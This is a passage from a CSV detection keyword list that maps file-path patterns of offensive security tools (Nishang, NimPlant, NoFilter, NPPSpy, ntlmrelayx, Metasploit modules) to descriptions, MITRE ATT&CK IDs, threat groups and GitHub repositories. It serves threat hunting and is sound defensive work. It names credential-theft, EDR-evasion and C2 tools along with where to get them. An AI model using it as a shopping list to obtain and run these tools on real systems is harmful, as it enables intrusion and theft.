TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*/nikto.git*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*/nikto.pl*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*/nikto.pl*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" +"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" +"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" +"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" +"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z" +"*/nimcrypt.nim*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" +"*/nimcrypt/*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" +"*/Nimcrypt2*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*/NimExec.git*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*/NimPlant.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/NimPlant/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/nimplants/*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*/ninja.crt*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/Ninja.git*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/ninja.key*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/nipe.git","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" +"*/nipe.pl","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" +"*/nishang*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1027 - T1210.001 - T1055.012 - T1047","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/nishang/*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/nje-node-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nje-pass-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nmap.py*","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/nmap_smb_scan_all_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/nmap-nse-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*/nmap-scada*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*/nmap-vulners*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*/nntp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Nofault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/NoFilter.cpp*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/NoFilter.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/NoFilter.git*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/NoFilter.sln*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/NoFilter.vcxproj*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*/nopac.exe","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*/nopac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/No-PowerShell.exe*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/nopowershell.git*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/nopowershell/*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/NoPowerShell/*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/noseyparker.git*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*/NotQuite0DayFriday/zip/trunk*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/nowsecure/dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" +"*/nping-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/NPPSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NPPSpy.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/nps_payload.git*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" +"*/nrpe-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nse_install/*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*/nse-install.git*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*/ntapphelpcachecontrol*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ntdissector.git*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/ntdissector/*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/ntdlll-unhooking-collection*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*/NTDLLReflection.git*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*/NtdllUnpatcher.git*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" +"*/ntds_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ntdsutil.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/ntlmquic*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*/NTLMRecon*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"*/NTLMRecon.git*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*/ntlmrecon/*.py*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*/NTLMRelay2Self*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" +"*/ntlmrelayx/*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/ntlmrelayx/*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*/ntlmscan.git*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" +"*/ntlmscan/*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" 